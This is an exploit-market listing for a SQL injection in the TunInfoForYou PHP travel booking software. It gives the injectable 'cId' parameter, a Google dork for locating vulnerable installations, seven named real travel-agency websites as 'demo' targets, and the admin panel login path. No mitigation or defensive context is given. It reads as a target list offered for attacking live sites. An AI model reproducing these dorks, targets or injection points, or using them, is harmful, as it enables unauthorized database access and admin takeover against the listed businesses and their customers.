[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

TunInfoForYou SQL Injection Vulnerability

Author
Ramzi Null
Risk
[
Security Risk High
]
0day-ID
0day-ID-19312
Category
web applications
Date add
03-09-2012
Platform
php
 #####################################################################
 # [+] Exploit Title           : TunInfoForYou SQL Injection
 # [+] Date                    : 03/09/2012
 # [+] Author                  : Ramzi Null [ramzi.null@aol.com]
 # [+] Facebook                : http://www.facebook.com/Ramzi.Pascal
 # [+] Vendor or Software Link : http://www.tuninfoforyou.com/
 # [+] Category                : Web Applications
 # [+] Google dork             : inurl:/"details-excursion.php?cId="
 # [+] Vulnerability           : SQL Injection Vulnerability
 # [+] Tested On               : Backtrack 5
 #####################################################################

[+] SQL Exploit
:-----------------------------------------------------------------:
http://www.site.com.tn/[path]/details-excursion.php?cId=['SQL]
:-----------------------------------------------------------------:

[+] Demo
:-----------------------------------------------------------------:
http://www.tunisivision.com/details-excursion.php?cId=19'
http://www.green-tours.net/details-excursion.php?cId=5'
http://sunsmiletours.net/details-excursion.php?cId=3'
http://www.midotravel.net/details-excursion.php?cId=23'
http://www.aquasun.com.tn/details-excursion.php?cId=4'
http://www.pltravel.tn/details-excursion.php?cId=20'
http://www.oxygenevoyages.net/details-excursion.php?cId=1'
:-----------------------------------------------------------------:

[+] Admin Cpanel
:-----------------------------------------------------------------:
http://www.site.com.tn/[path]/reservation/admin/login.php
:-----------------------------------------------------------------:

[+] Greetz to
:-------------------------------------------------------------------------------:
: # Greetz to : The Commender, Ned Null, Tn_Scorpion, ReDeYeF City(El 5anfoussa)
:-------------------------------------------------------------------------------:



#  0day.today [2024-12-26]  #